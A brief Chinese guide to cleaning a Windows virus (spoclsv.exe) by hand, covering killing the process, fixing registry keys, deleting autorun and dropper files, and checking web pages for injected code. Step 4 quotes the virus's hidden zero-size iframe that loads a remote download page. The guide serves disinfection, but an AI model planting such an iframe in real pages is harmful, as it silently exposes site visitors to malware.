1、点击“开始→运行”,输入n t s d -c q -p n spoclsv.exe并确定,结束病毒的进程。
2、在注册表中寻找HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,将CheckedValue的值改成1。打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,将svcshare的项目删除。
3、删除硬盘各个分区根目录下的s e t u p.e x e和autorun.inf文件,删除掉C:\Windows\System32\Drivers下的spoclsv.exe文件。
4、搜索硬盘上的网页格式文件,找到其中类似<iframe src="http//www.ctv163.com/wuhan/down.htm"width="0" height="0" frameborder="0"> </iframe>的文字,将其删除。被嵌入的代码可能是其他的网址。
5、该病毒的一些变种会感染E X E 可执行文件,因此建议使用杀毒软件或专杀工具清除该病毒。